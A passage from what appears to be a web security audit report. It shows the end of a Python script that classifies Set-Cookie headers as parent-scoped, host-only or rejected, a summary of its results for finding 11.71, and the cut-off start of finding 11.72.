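    if scoped_to_parent:
        notes.append(f"sent to every host under {domain}, not only {host}")
        if not httponly:
            notes.append("no HttpOnly: readable by script on any subdomain")
        if not secure:
            notes.append("no Secure: also delivered to plain-http subdomains")
    return CookieScope(name, domain, path, secure, httponly, accepted, scoped_to_parent, notes)


def audit(headers: List[str], host: str) -> List[CookieScope]:
    return [check_cookie(h, host) for h in headers]


if __name__ == "__main__":
    for c in audit(SAMPLE_SET_COOKIE, ISSUING_HOST):
        label = "PARENT-SCOPED" if c.scoped_to_parent else ("REJECTED" if not c.accepted else "host-only")
        print(f"{c.name:34} {label:14} {'; '.join(c.notes)}")
```

Run against the 11.71 headers, the script reports ProductDetail_RecentlyViewed_PCR as parent-scoped without Secure or HttpOnly, PCR_SelectedProducts as host-only, and CURRENTSESSION_ as rejected because .proflowers.com does not cover www.personalcreations.com. Feeding it the Set-Cookie lines of any other finding in this section gives the same three verdicts.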

11.72. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

Summary

Severity: